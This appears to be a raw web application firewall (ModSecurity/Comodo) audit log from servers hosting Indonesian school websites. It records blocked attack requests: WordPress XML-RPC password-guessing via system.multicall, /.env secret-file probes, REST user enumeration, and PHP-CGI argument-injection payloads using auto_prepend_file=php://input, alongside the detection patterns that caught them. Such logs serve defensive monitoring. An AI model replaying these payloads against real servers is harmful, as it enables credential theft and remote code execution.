text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --f4796b65-C-- system.multicall methodName wp.getUsersBlogs params Miswan M.Ag, M.Kom pass Miswan M.Ag, M.Kom Miswan M.Ag, M.Kom --f4796b65-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f4796b65-E-- --f4796b65-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747961512787330 7295 (- - -) Stopwatch2: 1747961512787330 7295; combined=5417, p1=513, p2=4780, p3=0, p4=0, p5=74, sr=91, sw=50, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4796b65-Z-- --5461036f-A-- [23/May/2025:07:56:27 +0700] aC_Hu1YzwfxII7zMfyHejAAAAAk 103.236.140.4 40128 103.236.140.4 8181 --5461036f-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1732 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --5461036f-C-- system.multicall methodName wp.getUsersBlogs params SMKN 22 Jakarta password SMKN 22 Jakarta SMKN 22 Jakarta --5461036f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5461036f-E-- --5461036f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747961787607018 7295 (- - -) Stopwatch2: 1747961787607018 7295; combined=5690, p1=461, p2=5035, p3=0, p4=0, p5=112, sr=89, sw=82, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5461036f-Z-- --3f732d21-A-- [23/May/2025:07:58:01 +0700] aC_IGbz70bfNdlplZZOzqAAAAFM 103.236.140.4 40148 103.236.140.4 8181 --3f732d21-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1743 User-Agent: Googlebot/2.1 (+http://www.google.com/bot.html) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --3f732d21-C-- system.multicall methodName wp.getUsersBlogs params SMKN 22 Jakarta SMKN 22 Jakarta2024 SMKN 22 Jakarta SMKN 22 Jakarta --3f732d21-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f732d21-E-- --3f732d21-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747961881177735 7410 (- - -) Stopwatch2: 1747961881177735 7410; combined=5770, p1=462, p2=5098, p3=0, p4=0, p5=120, sr=85, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f732d21-Z-- --bbcb5d4d-A-- [23/May/2025:07:59:35 +0700] aC_Id1YzwfxII7zMfyHelwAAABg 103.236.140.4 40162 103.236.140.4 8181 --bbcb5d4d-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1734 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 OPR/77.0.4054.172 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --bbcb5d4d-C-- system.multicall methodName wp.getUsersBlogs params SMKN 22 Jakarta smkn22-jkt SMKN 22 Jakarta SMKN 22 Jakarta --bbcb5d4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bbcb5d4d-E-- --bbcb5d4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (0+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747961975979296 7468 (- - -) Stopwatch2: 1747961975979296 7468; combined=5789, p1=459, p2=5152, p3=0, p4=0, p5=105, sr=91, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bbcb5d4d-Z-- --a78d6d12-A-- [23/May/2025:08:02:22 +0700] aC_JHh67_KloOut96Ene0AAAAI4 103.236.140.4 40200 103.236.140.4 8181 --a78d6d12-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1727 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:114.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --a78d6d12-C-- system.multicall methodName wp.getUsersBlogs params Tim Kreatif Tim Kreatif2025 Tim Kreatif Tim Kreatif --a78d6d12-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a78d6d12-E-- --a78d6d12-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747962142481349 6637 (- - -) Stopwatch2: 1747962142481349 6637; combined=4907, p1=399, p2=4326, p3=0, p4=0, p5=109, sr=75, sw=73, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a78d6d12-Z-- --ce722112-A-- [23/May/2025:08:04:10 +0700] aC_Jih67_KloOut96Ene1QAAAJY 103.236.140.4 40334 103.236.140.4 8181 --ce722112-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 64.227.70.2 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 64.227.70.2 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --ce722112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce722112-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747962250278335 705 (- - -) Stopwatch2: 1747962250278335 705; combined=257, p1=227, p2=0, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce722112-Z-- --3208c82e-A-- [23/May/2025:08:07:39 +0700] aC_KW1YzwfxII7zMfyHeyQAAAAg 103.236.140.4 40380 103.236.140.4 8181 --3208c82e-B-- POST /xmlrpc.php HTTP/1.0 Referer: www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 35.187.198.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 35.187.198.59 X-Forwarded-Proto: https Connection: close Content-Length: 1771 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:114.0) Gecko/20100101 Firefox/114.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Accept-Language: en-US,en;q=0.9,fr;q=0.8 --3208c82e-C-- system.multicall methodName wp.getUsersBlogs params Wakil Bidang Kesiswaan Wakil Bidang Kesiswaan2024 Wakil Bidang Kesiswaan Wakil Bidang Kesiswaan --3208c82e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3208c82e-E-- --3208c82e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. 
[file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 35.187.198.59 (+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747962459262942 8201 (- - -) Stopwatch2: 1747962459262942 8201; combined=6252, p1=527, p2=5551, p3=0, p4=0, p5=105, sr=107, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3208c82e-Z-- --392eeb19-A-- [23/May/2025:08:35:14 +0700] aC_Q0h67_KloOut96EnfBgAAAJc 103.236.140.4 40694 103.236.140.4 8181 --392eeb19-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 201.76.191.240 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 201.76.191.240 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --392eeb19-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --392eeb19-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747964114904806 2621 (- - -) Stopwatch2: 1747964114904806 2621; combined=1301, p1=434, p2=837, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --392eeb19-Z-- --b7187659-A-- [23/May/2025:08:40:48 +0700] aC_SIG_WNRyhaqaKDLwiiwAAANg 103.236.140.4 40730 103.236.140.4 8181 --b7187659-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 36.88.104.58 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 36.88.104.58 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --b7187659-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7187659-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747964448409898 2831 (- - -) Stopwatch2: 1747964448409898 2831; combined=1263, p1=441, p2=788, p3=0, p4=0, p5=34, sr=86, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7187659-Z-- --07e53e30-A-- [23/May/2025:09:05:25 +0700] aC_X5R67_KloOut96EnfHAAAAI8 103.236.140.4 40968 103.236.140.4 8181 --07e53e30-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.71.81.114 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.71.81.114 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --07e53e30-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --07e53e30-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747965925965448 683 (- - -) Stopwatch2: 1747965925965448 683; combined=266, p1=228, p2=0, p3=0, p4=0, p5=38, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --07e53e30-Z-- --5936557b-A-- [23/May/2025:09:08:54 +0700] aC_YtlYzwfxII7zMfyHfCAAAAA0 103.236.140.4 41004 103.236.140.4 8181 --5936557b-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2.1 Safari/605.1.15 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43, 103.236.140.4 Cookie: X-Varnish: 159432884 --5936557b-C-- --5936557b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5936557b-E-- --5936557b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747966134364484 4241 (- - -) Stopwatch2: 1747966134364484 4241; combined=2306, p1=519, p2=1756, p3=0, p4=0, p5=31, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5936557b-Z-- --a9374a60-A-- [23/May/2025:09:08:55 +0700] aC_Yt1YzwfxII7zMfyHfCQAAAA8 103.236.140.4 41010 103.236.140.4 8181 --a9374a60-B-- POST /index.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 162994941 --a9374a60-C-- --a9374a60-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a9374a60-E-- --a9374a60-H-- Message: Access denied with code 403 (phase 2). 
Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747966135103040 2871 (- - -) Stopwatch2: 1747966135103040 2871; combined=1716, p1=358, p2=1330, p3=0, p4=0, p5=28, sr=85, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a9374a60-Z-- --c30f236b-A-- [23/May/2025:09:08:55 +0700] aC_Yt1YzwfxII7zMfyHfCgAAABI 103.236.140.4 41014 103.236.140.4 8181 --c30f236b-B-- POST /test.php?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 159432887 --c30f236b-C-- --c30f236b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c30f236b-E-- --c30f236b-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1747966135854070 2122 (- - -) Stopwatch2: 1747966135854070 2122; combined=1252, p1=268, p2=964, p3=0, p4=0, p5=20, sr=48, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c30f236b-Z-- --a91d450d-A-- [23/May/2025:09:08:56 +0700] aC_YuFYzwfxII7zMfyHfCwAAABE 103.236.140.4 41018 103.236.140.4 8181 --a91d450d-B-- POST /test.hello?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firefox/124.0 Accept: */* Accept-Language: en X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 162994944 --a91d450d-C-- --a91d450d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a91d450d-E-- --a91d450d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. 
[file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd cgi.redirect_status_env \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd cgi.redirect_status_env \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747966136593251 2889 (- - -) Stopwatch2: 1747966136593251 2889; combined=1650, p1=349, p2=1271, p3=0, p4=0, p5=30, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a91d450d-Z-- --c30f236b-A-- [23/May/2025:09:17:12 +0700] aC_aqLz70bfNdlplZZO0IgAAAEc 103.236.140.4 41094 103.236.140.4 8181 --c30f236b-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 206.189.95.232 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 206.189.95.232 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --c30f236b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 